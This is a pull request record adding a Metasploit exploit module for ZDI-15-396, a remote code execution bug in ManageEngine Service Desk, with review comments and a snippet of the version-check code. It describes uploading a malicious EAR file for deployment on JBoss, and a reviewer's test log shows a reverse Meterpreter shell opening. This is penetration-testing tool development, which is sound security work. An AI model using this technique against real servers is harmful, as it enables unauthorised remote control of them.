### PR TITLE
Add exploit for ZDI-15-396

### PR DESCRIPTION
**Pull request by pedrib**
This is an exploit for ZDI-15-396, which is a remote code execution bug in ManageEngine Service Desk version 9 to 9.1 build 9102.
This module exploits the FileUploader serlvet to upload an EAR file that gets deployed on the JBOSS server. It has been well tested on many versions of Windows and Linux ranging from build 9000 to 9103.

### CODE REVIEW

**Comment by pedrib** [comment]
You can get the test versions from here: http://archives.manageengine.com/service-desk/

File: modules/exploits/multi/http/manageengine_sd_uploader.rb [hunk 1]
```diff
@@ -0,0 +1,134 @@
...
+
+    if res && res.code == 200 &&
+     res.body.to_s =~ /src='\/scripts\/Login\.js\?([0-9]+)'><\/script>/
+      build = $1
+      if build < "9103" && build > "9000"
+        return Exploit::CheckCode::Appears
+      end
+    end
+
+    return Exploit::CheckCode::Safe
```
Comment (espreto) [inline modules/exploits/multi/http/manageengine_sd_uploader.rb]: ```return``` is redundant here.

**Comment by wchen-r7** [comment]
Manual verification/testing is currently the preferred choice, because sometimes we can catch bugs in the process. If we can't verify (because we don't have the vuln app or whatever), then we fall back to pcaps.

I have just downloaded the software and I will start testing now. Thanks.

**Comment by jvazquez-r7** [comment]
Thanks @wchen-r7 !

**Comment by wchen-r7** [comment]
```
msf exploit(manageengine_sd_uploader) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] 192.168.1.188:8080 - Uploading EAR file...
[*] 192.168.1.188:8080 - Upload appears to have been successful, waiting 15 seconds for deployment
[*] Sending stage (46621 bytes) to 192.168.1.188
[*] Meterpreter session 1 opened (192.168.1.64:4444 -> 192.168.1.188:49582) at 2015-10-07 15:11:29 -0500
[+] Deleted ../server/default/deploy/null/SlNJB2gzlvI5xagizanF.ear
[+] Deleted Attachments/null/fqcyPiVLZzhjr1vgVUOSOPtNy5

meterpreter >
```

**Pull request merged**